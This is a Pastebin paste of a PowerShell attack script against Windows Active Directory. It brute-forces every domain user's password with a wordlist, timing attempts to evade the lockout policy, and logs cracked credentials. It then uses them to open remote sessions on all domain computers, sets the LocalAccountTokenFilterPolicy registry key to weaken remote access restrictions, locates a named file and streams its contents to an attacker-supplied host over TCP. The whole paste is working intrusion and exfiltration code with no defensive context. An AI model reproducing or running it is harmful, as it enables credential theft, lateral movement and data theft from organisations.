Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- $global:global_password = $null
- function BruteForceUser {
- param ( [string []] $passwords, [string] $username, [int32] $lockoutThreshold, [double] $lockoutObsWindowSeconds, [string] $LogFile, [REF]$global_password)
- $attemps = 0
- $global_password.Value = ""
- Write-Output "----------------------------------------------------------------------"
- Write-Output "[*] Brute Forcing passwords for username: '$username'"
- foreach ($password in $passwords) {
- Write-Output "Trying password $password"
- if($attempts -eq $lockoutThreshold) {
- Write-Output "Hit threshold limit...sleeping"
- $lockoutObsWindowSeconds = $lockoutObsWindowSeconds + 3
- Start-Sleep $lockoutObsWindowSeconds
- $attempts = 0
- Write-Output "Reattempting to brute force"
- }
- $dom = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$(([adsi]'').distinguishedName)",$username,$password)
- $res = $dom.name
- if($res -eq $null) {
- Write-Output "Password '$password' was wrong"
- $attempts = $attempts + 1
- }
- else {
- Write-Output "Password '$password' was right!!!"
- if($LogFile) {
- Add-Content $LogFile "$username has this password: $password"
- }
- else {
- Write-Output "'$username' has this password: '$password'"
- }
- $global_password.Value = $password
- return 1
- }
- }
- Write-Output "Not able to brute force password for'$username'"
- return 0
- }
- function BeginImpant {
- param( [string] $PassList, [string] $FileName, $Target, [string] $LogFile)
- Import-Module activedirectory
- $domain = (Get-ADDomain -Current LoggedOnUser).distinguishedName
- $ip = $Target.split(":")[0]
- $port = [int] $Target.split(":")[1]
- $socket = New-Object Net.Sockets.TcpClient($ip,$port) -ErrorAction Stop
- $tcpStream = $socket.GetStream()
- $writer = New-Object System.IO.StreamWriter($tcpStream)
- $writer.AutoFlush = $true
- $userAccounts = Get-ADUser -Filter * -SearchBase $domain | Select-Object -ExpandProperty SamAccountName
- [string []] $passwordList = Get-Content -Path $PassList
- $accountInfo = Get-ADDefaultDomainPasswordPolicy | Select LockoutThreshold, LockoutObservationWindow
- $lockoutThreshold = $accountInfo.LockoutThreshold
- $lockoutObsWindow = $accountInfo.LockoutObservationWindow.TotalSeconds
- $successfulAccounts = @()
- foreach ($userName in $userAccounts) {
- Write-Output "[*] Processing username: '$userName'"
- BruteForceUser $passwordList $userName $lockoutThreshold $lockoutObsWindow $LogFile ([REF]$global:global_password)
- if($global_password -eq "") {Write-Output "Password not found"}
- else {
- $res = "" | Select-Object username,password
- $res.username = $userName
- $res.password = $global_password
- $successfulAccounts += $res
- }
- }
- Write-Host $successfulAccounts
- $computers = Get-ADComputer -Filter * | Select -ExpandProperty name
- Write-Host $computers
- foreach($computer in $computers) {
- foreach($userInfo in $successfulAccounts) {
- $secstr = New-Object -TypeName System.Security.SecureString
- $userInfo.password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}
- $cred = New-Object -typename System.Management.Automation.PSCredential $userInfo.username,$secstr
- $uname = $userInfo.username
- try {
- $s = New-PSSession -ComputerName $computer -Credential $cred -ErrorAction SilentlyContinue
- $checkKeyExists = Invoke-Command -Session $s -Scriptblock {Test-Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy -ErrorAction SilentlyContinue}
- if($checkKeyExists -eq $false) {
- Write-Host "Creating registry key on $computer"
- Invoke-Command -Session $s -Scriptblock {New-Item -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LocalAccountTokenFilterPolicy -ErrorAction SilentlyContinue -Force}
- }
- Write-Host "Setting value of key to 1 in $computer"
- Invoke-Command -Session $s -Scriptblock {Set-Item -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy -Value "1" -ErrorAction SilentlyContinue}
- $res = Invoke-Command -Session $s -Scriptblock {param($fname) Get-ChildItem -Path C:\ -Recurse -Filter $fname -ErrorAction SilentlyContinue -Force} -ArgumentList $FileName
- if ($res -eq $null) {
- Write-Output "File not found in user $uname in computer $computer"
- }
- else {
- $filePath = $res.FullName
- $fileContent = Invoke-Command -Session $s -Scriptblock {param($fpath) [IO.File]::ReadAllText($fpath)} -ArgumentList $filePath
- Write-Host "File found...: $fileContent"
- Write-Host "Sending file to server"
- $writer.WriteLine($fileContent)
- }
- Remove-PSSession $s
- }
- catch {
- Write-Output "Some error occured in computer $computer with user $uname"
- }
- }
- }
- }
Add Comment
Please, Sign In to add comment